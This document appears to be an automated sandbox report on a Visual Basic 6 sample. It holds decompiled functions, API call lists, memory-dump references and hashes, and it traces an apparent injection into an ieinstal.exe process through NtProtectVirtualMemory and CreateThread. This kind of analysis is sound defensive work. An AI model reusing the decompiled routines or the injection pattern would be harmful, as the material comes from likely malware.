				signed int _t138;

				_t138 = __fp0;
				_t130 = _t129 - 0xc;
				 *[fs:0x0] = _t130;
				L004012B0();
				_v16 = _t130;
				_v12 = 0x401220;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x74,  *[fs:0x0], 0x4012b6, _t127);
				if( *0x411010 != 0) {
					_v112 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v112 = 0x411010;
				}
				_t83 =  &_v28;
				L00401400();
				_v88 = _t83;
				_t86 =  *((intOrPtr*)( *_v88 + 0x1c0))(_v88, _t83,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x2fc))( *_v112));
				asm("fclex");
				_v92 = _t86;
				if(_v92 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x1c0);
					_push(0x40b290);
					_push(_v88);
					_push(_v92);
					L0040140C();
					_v116 = _t86;
				}
				L00401406();
				if( *0x411010 != 0) {
					_v120 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v120 = 0x411010;
				}
				_t90 =  &_v28;
				L00401400();
				_v88 = _t90;
				_t94 =  *((intOrPtr*)( *_v88 + 0x190))(_v88,  &_v84, _t90,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x2fc))( *_v120));
				asm("fclex");
				_v92 = _t94;
				if(_v92 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x40b290);
					_push(_v88);
					_push(_v92);
					L0040140C();
					_v124 = _t94;
				}
				if( *0x411010 != 0) {
					_v128 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v128 = 0x411010;
				}
				_t118 =  *((intOrPtr*)( *_v128));
				_t98 =  &_v32;
				L00401400();
				_v96 = _t98;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v132 = _v84;
				asm("fild dword [ebp-0x80]");
				_v136 = _t138;
				_v92 = _v136;
				_t105 =  *((intOrPtr*)( *_v96 + 0x1cc))(_v96, _t118, 0x10, 0x10, 0x10, _t98,  *((intOrPtr*)(_t118 + 0x2fc))( *_v128));
				asm("fclex");
				_v100 = _t105;
				if(_v100 >= 0) {
					_v140 = _v140 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x40b290);
					_push(_v96);
					_push(_v100);
					L0040140C();
					_v140 = _t105;
				}
				_push( &_v32);
				_t107 =  &_v28;
				_push(_t107);
				_push(2);
				L004013E8();
				asm("wait");
				_push(E0040F898);
				return _t107;
			}

0x0040f624
0x0040f627
0x0040f636
0x0040f640
0x0040f648
0x0040f64b
0x0040f652
0x0040f661
0x0040f66b
0x0040f685
0x0040f66d
0x0040f66d
0x0040f672
0x0040f677
0x0040f67c
0x0040f67c
0x0040f6a0
0x0040f6a4
0x0040f6a9
0x0040f6b4
0x0040f6ba
0x0040f6bc
0x0040f6c3
0x0040f6df
0x0040f6c5
0x0040f6c5
0x0040f6ca
0x0040f6cf
0x0040f6d2
0x0040f6d5
0x0040f6da
0x0040f6da
0x0040f6e6
0x0040f6f2
0x0040f70c
0x0040f6f4
0x0040f6f4
0x0040f6f9
0x0040f6fe
0x0040f703
0x0040f703
0x0040f727
0x0040f72b
0x0040f730
0x0040f73f
0x0040f745
0x0040f747
0x0040f74e
0x0040f76a
0x0040f750
0x0040f750
0x0040f755
0x0040f75a
0x0040f75d
0x0040f760
0x0040f765
0x0040f765
0x0040f775
0x0040f78f
0x0040f777
0x0040f777
0x0040f77c
0x0040f781
0x0040f786
0x0040f786
0x0040f7a0
0x0040f7aa
0x0040f7ae
0x0040f7b3
0x0040f7b6
0x0040f7bd
0x0040f7c4
0x0040f7cb
0x0040f7d2
0x0040f7d9
0x0040f7e3
0x0040f7ed
0x0040f7ee
0x0040f7ef
0x0040f7f0
0x0040f7f4
0x0040f7fe
0x0040f7ff
0x0040f800
0x0040f801
0x0040f805
0x0040f80f
0x0040f810
0x0040f811
0x0040f812
0x0040f817
0x0040f81a
0x0040f81d
0x0040f82a
0x0040f835
0x0040f83b
0x0040f83d
0x0040f844
0x0040f863
0x0040f846
0x0040f846
0x0040f84b
0x0040f850
0x0040f853
0x0040f856
0x0040f85b
0x0040f85b
0x0040f86d
0x0040f86e
0x0040f871
0x0040f872
0x0040f874
0x0040f87c
0x0040f87d
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040F640
__vbaNew2.MSVBVM60(0040B81C,00411010,?,?,?,?,004012B6), ref: 0040F677
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F6A4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001C0), ref: 0040F6D5
__vbaFreeObj.MSVBVM60 ref: 0040F6E6
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040F6FE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F72B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,00000190), ref: 0040F760
__vbaNew2.MSVBVM60(0040B81C,00411010), ref: 0040F781
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040F7AE
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F7E3
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F7F4
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040F805
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001CC,?,?,00000000), ref: 0040F856
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0040F874

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Chkstk$CheckHresultNew2$Free$List
String ID:
API String ID: 258320916-0
Opcode ID: 61a66ae8f42b7ddd0e7f9e9d9baa933a8be633ea689a325ae115bd62b8d0ce9b
Instruction ID: 5692f924a0935569aa023d47038b94d6c5db3890144caad9acccd0e84082ce1a
Opcode Fuzzy Hash: 61a66ae8f42b7ddd0e7f9e9d9baa933a8be633ea689a325ae115bd62b8d0ce9b
Instruction Fuzzy Hash: 7871E271D00208DFCB11DFE5C889BDEBBB5BB08304F20857AE505BB2A5C7B959899F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040FDED, Relevance: 19.6, APIs: 13, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040FDED(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				signed int _v36;
				intOrPtr _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				char* _t54;
				signed int _t58;
				char* _t62;
				signed int _t66;
				intOrPtr _t88;

				_push(0x4012b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t88;
				_push(0x34);
				L004012B0();
				_v12 = _t88;
				_v8 = 0x401278;
				L004013F4();
				if( *0x411010 != 0) {
					_v60 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v60 = 0x411010;
				}
				_t54 =  &_v28;
				L00401400();
				_v48 = _t54;
				_v36 = _v36 & 0x00000000;
				_v44 = 2;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t58 =  *((intOrPtr*)( *_v48 + 0x1d0))(_v48, 0x10, _t54,  *((intOrPtr*)( *((intOrPtr*)( *_v60)) + 0x2fc))( *_v60));
				asm("fclex");
				_v52 = _t58;
				if(_v52 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x40b290);
					_push(_v48);
					_push(_v52);
					L0040140C();
					_v64 = _t58;
				}
				L00401406();
				if( *0x411010 != 0) {
					_v68 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v68 = 0x411010;
				}
				_t62 =  &_v28;
				L00401400();
				_v48 = _t62;
				_v36 = 1;
				_v44 = 2;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t66 =  *((intOrPtr*)( *_v48 + 0x1d0))(_v48, 0x10, _t62,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x2fc))( *_v68));
				asm("fclex");
				_v52 = _t66;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x40b290);
					_push(_v48);
					_push(_v52);
					L0040140C();
					_v72 = _t66;
				}
				L00401406();
				_push(E0040FF87);
				L004013DC();
				return _t66;
			}

0x0040fdf2
0x0040fdfd
0x0040fdfe
0x0040fe05
0x0040fe08
0x0040fe10
0x0040fe13
0x0040fe20
0x0040fe2c
0x0040fe46
0x0040fe2e
0x0040fe2e
0x0040fe33
0x0040fe38
0x0040fe3d
0x0040fe3d
0x0040fe61
0x0040fe65
0x0040fe6a
0x0040fe6d
0x0040fe71
0x0040fe7b
0x0040fe85
0x0040fe86
0x0040fe87
0x0040fe88
0x0040fe91
0x0040fe97
0x0040fe99
0x0040fea0
0x0040febc
0x0040fea2
0x0040fea2
0x0040fea7
0x0040feac
0x0040feaf
0x0040feb2
0x0040feb7
0x0040feb7
0x0040fec3
0x0040fecf
0x0040fee9
0x0040fed1
0x0040fed1
0x0040fed6
0x0040fedb
0x0040fee0
0x0040fee0
0x0040ff04
0x0040ff08
0x0040ff0d
0x0040ff10
0x0040ff17
0x0040ff21
0x0040ff2b
0x0040ff2c
0x0040ff2d
0x0040ff2e
0x0040ff37
0x0040ff3d
0x0040ff3f
0x0040ff46
0x0040ff62
0x0040ff48
0x0040ff48
0x0040ff4d
0x0040ff52
0x0040ff55
0x0040ff58
0x0040ff5d
0x0040ff5d
0x0040ff69
0x0040ff6e
0x0040ff81
0x0040ff86

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040FE08
__vbaStrCopy.MSVBVM60(?,?,?,?,004012B6), ref: 0040FE20
__vbaNew2.MSVBVM60(0040B81C,00411010,?,?,?,?,004012B6), ref: 0040FE38
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FE65
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FE7B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001D0,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FEB2
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FEC3
__vbaNew2.MSVBVM60(0040B81C,00411010,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FEDB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FF08
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FF21
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001D0), ref: 0040FF58
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FF69
__vbaFreeStr.MSVBVM60(0040FF87,?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040FF81

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$ChkstkFree$CheckHresultNew2$Copy
String ID:
API String ID: 1703624541-0
Opcode ID: 63a71d81ae53f3ecaeac6e828118c0c9ac32f12716f28f3805169a4a4221e752
Instruction ID: ac7a912d740f20c58ca3b37901159338f17ba72e08a1fc89486d760ed6e9e130
Opcode Fuzzy Hash: 63a71d81ae53f3ecaeac6e828118c0c9ac32f12716f28f3805169a4a4221e752
Instruction Fuzzy Hash: 5B412771D00208EFCB11DFA5C84ABDEBBB5BF08314F20443AF501BB6A1C7B968459B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F203, Relevance: 15.1, APIs: 10, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040F203(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				signed int _v36;
				intOrPtr _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				char* _t48;
				signed int _t51;
				char* _t55;
				signed int _t59;
				intOrPtr _t76;

				_push(0x4012b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t76;
				_push(0x34);
				L004012B0();
				_v12 = _t76;
				_v8 = 0x401200;
				if( *0x411010 != 0) {
					_v60 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v60 = 0x411010;
				}
				_t48 =  &_v28;
				L00401400();
				_v48 = _t48;
				_t51 =  *((intOrPtr*)( *_v48 + 0x1c4))(_v48, _t48,  *((intOrPtr*)( *((intOrPtr*)( *_v60)) + 0x2fc))( *_v60));
				asm("fclex");
				_v52 = _t51;
				if(_v52 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x1c4);
					_push(0x40b290);
					_push(_v48);
					_push(_v52);
					L0040140C();
					_v64 = _t51;
				}
				L00401406();
				if( *0x411010 != 0) {
					_v68 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v68 = 0x411010;
				}
				_t55 =  &_v28;
				L00401400();
				_v48 = _t55;
				_v36 = _v36 & 0x00000000;
				_v44 = 2;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t59 =  *((intOrPtr*)( *_v48 + 0x1d0))(_v48, 0x10, _t55,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x2fc))( *_v68));
				asm("fclex");
				_v52 = _t59;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x40b290);
					_push(_v48);
					_push(_v52);
					L0040140C();
					_v72 = _t59;
				}
				L00401406();
				_push(E0040F36B);
				return _t59;
			}

0x0040f208
0x0040f213
0x0040f214
0x0040f21b
0x0040f21e
0x0040f226
0x0040f229
0x0040f237
0x0040f251
0x0040f239
0x0040f239
0x0040f23e
0x0040f243
0x0040f248
0x0040f248
0x0040f26c
0x0040f270
0x0040f275
0x0040f280
0x0040f286
0x0040f288
0x0040f28f
0x0040f2ab
0x0040f291
0x0040f291
0x0040f296
0x0040f29b
0x0040f29e
0x0040f2a1
0x0040f2a6
0x0040f2a6
0x0040f2b2
0x0040f2be
0x0040f2d8
0x0040f2c0
0x0040f2c0
0x0040f2c5
0x0040f2ca
0x0040f2cf
0x0040f2cf
0x0040f2f3
0x0040f2f7
0x0040f2fc
0x0040f2ff
0x0040f303
0x0040f30d
0x0040f317
0x0040f318
0x0040f319
0x0040f31a
0x0040f323
0x0040f329
0x0040f32b
0x0040f332
0x0040f34e
0x0040f334
0x0040f334
0x0040f339
0x0040f33e
0x0040f341
0x0040f344
0x0040f349
0x0040f349
0x0040f355
0x0040f35a
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040F21E
__vbaNew2.MSVBVM60(0040B81C,00411010,?,?,?,?,004012B6), ref: 0040F243
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F270
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001C4,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F2A1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F2B2
__vbaNew2.MSVBVM60(0040B81C,00411010,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F2CA
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F2F7
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F30D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001D0), ref: 0040F344
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004012B6), ref: 0040F355

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: a317773d9ad34c84ed8dbd5d7ec78b43b372e16306831d6a898ff46eebb0e742
Instruction ID: cfbb866065c5286e10498066af07eeb9e0560c0d09100cc3ed8421843fcb9522
Opcode Fuzzy Hash: a317773d9ad34c84ed8dbd5d7ec78b43b372e16306831d6a898ff46eebb0e742
Instruction Fuzzy Hash: 4D410470D40208AFCB11DFA5C889BDDBBB4BB08754F10847AF501BB6A1C7B968859B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEDE, Relevance: 15.1, APIs: 10, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040EEDE(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v48;
				char _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v104;
				signed int _v108;
				char* _t44;
				signed int _t48;
				void* _t62;
				void* _t64;
				intOrPtr _t65;

				_t65 = _t64 - 0xc;
				 *[fs:0x0] = _t65;
				L004012B0();
				_v16 = _t65;
				_v12 = 0x4011d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x54,  *[fs:0x0], 0x4012b6, _t62);
				L004013E2();
				_v60 = 0x80020004;
				_v68 = 0xa;
				_push( &_v68);
				L004013B2();
				L00401418();
				if( *0x411010 != 0) {
					_v104 = 0x411010;
				} else {
					_push(0x411010);
					_push(0x40b81c);
					L00401412();
					_v104 = 0x411010;
				}
				_t44 =  &_v52;
				L00401400();
				_v88 = _t44;
				_v76 = 0x80020004;
				_v84 = 0xa;
				L004012B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t48 =  *((intOrPtr*)( *_v88 + 0x1c8))(_v88, 0x10, _t44,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x2fc))( *_v104));
				asm("fclex");
				_v92 = _t48;
				if(_v92 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x40b290);
					_push(_v88);
					_push(_v92);
					L0040140C();
					_v108 = _t48;
				}
				L00401406();
				asm("wait");
				_push(E0040F010);
				L00401418();
				return _t48;
			}

0x0040eee1
0x0040eef0
0x0040eefa
0x0040ef02
0x0040ef05
0x0040ef0c
0x0040ef1b
0x0040ef24
0x0040ef29
0x0040ef30
0x0040ef3a
0x0040ef3b
0x0040ef43
0x0040ef4f
0x0040ef69
0x0040ef51
0x0040ef51
0x0040ef56
0x0040ef5b
0x0040ef60
0x0040ef60
0x0040ef84
0x0040ef88
0x0040ef8d
0x0040ef90
0x0040ef97
0x0040efa1
0x0040efab
0x0040efac
0x0040efad
0x0040efae
0x0040efb7
0x0040efbd
0x0040efbf
0x0040efc6
0x0040efe2
0x0040efc8
0x0040efc8
0x0040efcd
0x0040efd2
0x0040efd5
0x0040efd8
0x0040efdd
0x0040efdd
0x0040efe9
0x0040efee
0x0040efef
0x0040f00a
0x0040f00f

APIs

__vbaChkstk.MSVBVM60(?,004012B6), ref: 0040EEFA
__vbaVarDup.MSVBVM60(?,?,?,?,004012B6), ref: 0040EF24
#594.MSVBVM60(0000000A), ref: 0040EF3B
__vbaFreeVar.MSVBVM60(0000000A), ref: 0040EF43
__vbaNew2.MSVBVM60(0040B81C,00411010,0000000A), ref: 0040EF5B
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,0000000A), ref: 0040EF88
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,0000000A), ref: 0040EFA1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B290,000001C8,?,?,?,?,?,?,?,?,0000000A), ref: 0040EFD8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,0000000A), ref: 0040EFE9
__vbaFreeVar.MSVBVM60(0040F010,?,?,?,?,?,?,?,?,0000000A), ref: 0040F00A

Memory Dump Source

Source File: 00000000.00000002.595879092.000000000040A000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.595841703.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.595851863.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.595908678.0000000000411000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.595931964.0000000000412000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$Chkstk$#594CheckHresultNew2
String ID:
API String ID: 2156659416-0
Opcode ID: d491b573823d3ff80f233a10107107abf8b6542069b6e1a02ebfe71a3b6ea6ec
Instruction ID: 062ac4be94577327ede199057cadfb63844b5719a9beddf8871967a166e43f67
Opcode Fuzzy Hash: d491b573823d3ff80f233a10107107abf8b6542069b6e1a02ebfe71a3b6ea6ec
Instruction Fuzzy Hash: 48310470900348EBDB01EFE1C885B9DBBB4BF08708F20447AF505BB2A1C7B96949CB59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ieinstal.exe PID: 6128 Parent PID: 5260 ieinstal.exeCOMMON

Executed Functions

Function 032D550F, Relevance: 2.1, APIs: 1, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 957de4fa36e1b988b4716b56a1179c81a940cd99f6320a1e93e47cd35483d3c1
Instruction ID: d3b54693079f6827e306e0d46ea997d2e6cb830dcb723199944c454a1c6df1ab
Opcode Fuzzy Hash: 957de4fa36e1b988b4716b56a1179c81a940cd99f6320a1e93e47cd35483d3c1
Instruction Fuzzy Hash: 63224770678346DFEF25DE24CC84BE976A6AF03310F688269ED969B2D1C7F484C18752

Uniqueness

Uniqueness Score: -1.00%

Function 032D5B11, Relevance: 1.5, APIs: 1, Instructions: 16nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,032D5614,00000040,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D5ABF

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4640db4de5c079262d7573e6ad017d9051276e1a14a1dc6682d7d3481b96b501
Instruction ID: 985b9e06eb340eb942eec0495f5e9c14f637b9ed4440db20b911362e5858aa22
Opcode Fuzzy Hash: 4640db4de5c079262d7573e6ad017d9051276e1a14a1dc6682d7d3481b96b501
Instruction Fuzzy Hash: 28D0C9A0128020AEA9159A28CD44C27737AD6E6729734C759B062661CCC7709C8981B1

Uniqueness

Uniqueness Score: -1.00%

Function 032D5AA6, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,032D5614,00000040,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D5ABF

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 032D1E2D, Relevance: 1.7, APIs: 1, Instructions: 214threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000,032D23BB,?,?,?,?,?,00000000,00000004,00000000,00000000,?,?), ref: 032D1FE7

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: e4bd27fbf6f7d1d0b4854651bee4dcb0aba7d6abed4bc541b285afccc16d1cf2
Instruction ID: dba921912f91ef7e6285a9c949e26c7248f2565184c8bb8acf9ece22bff1be7a
Opcode Fuzzy Hash: e4bd27fbf6f7d1d0b4854651bee4dcb0aba7d6abed4bc541b285afccc16d1cf2
Instruction Fuzzy Hash: 98E026101AC3449AEB6147B44D903A83B93DF03230FA4028AD9620A1D183AA11D1CB23

Uniqueness

Uniqueness Score: -1.00%

Function 032D5F53, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 032D61D2

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 7a1ce54380b01aab31e853196332dd97c5345bc6748469624790a81aa560ebb2
Instruction ID: 4cb32c8badfb31dd256f8dc8c1519928e9a503c42e2aa6ada5baa37483b89208
Opcode Fuzzy Hash: 7a1ce54380b01aab31e853196332dd97c5345bc6748469624790a81aa560ebb2
Instruction Fuzzy Hash: 6F41E630A38207DEFF24CE28C99C3B97762AB17311FE842A9C9579A1D5D7F9C4C88641

Uniqueness

Uniqueness Score: -1.00%

Function 032D5F68, Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d0fe2c50388fdfe7ebfa33813eae1ea0a4f4af4379e72757ec30ae235bbe9d7
Instruction ID: 4483f824faec3c716eb3d2db0bf24392ce8c1965b87ea23e9f2b347df78d2b4d
Opcode Fuzzy Hash: 7d0fe2c50388fdfe7ebfa33813eae1ea0a4f4af4379e72757ec30ae235bbe9d7
Instruction Fuzzy Hash: 3E41D220A38207DEFF25CA24C99C7B97762AF07311FEC41A9C8479A191D7F9C4C88641

Uniqueness

Uniqueness Score: -1.00%

Function 032D5FA9, Relevance: 1.6, APIs: 1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 321451d3c8975c25256b7f6404e20989c4f85901e0484a028e4d37fb201d7f02
Instruction ID: c4be53a2d6924960b1e327188dd8c6f027623304978328e2b9507c9b99fe6a93
Opcode Fuzzy Hash: 321451d3c8975c25256b7f6404e20989c4f85901e0484a028e4d37fb201d7f02
Instruction Fuzzy Hash: 4D41F420A3C207DEFF25CA14C99C3B87762AF07311FE841AAC8479A191D7F9C4C88642

Uniqueness

Uniqueness Score: -1.00%

Function 032D5FC1, Relevance: 1.6, APIs: 1, Instructions: 122threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 032D61D2

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: ac52919c5650a4b318c87b5fcedf4950b6b5b474b14b33b4cd2e695b655e8bc5
Instruction ID: a6518c215858366b81b59a0385df990992d73a24cc586ea6d4ec0d55951e43ae
Opcode Fuzzy Hash: ac52919c5650a4b318c87b5fcedf4950b6b5b474b14b33b4cd2e695b655e8bc5
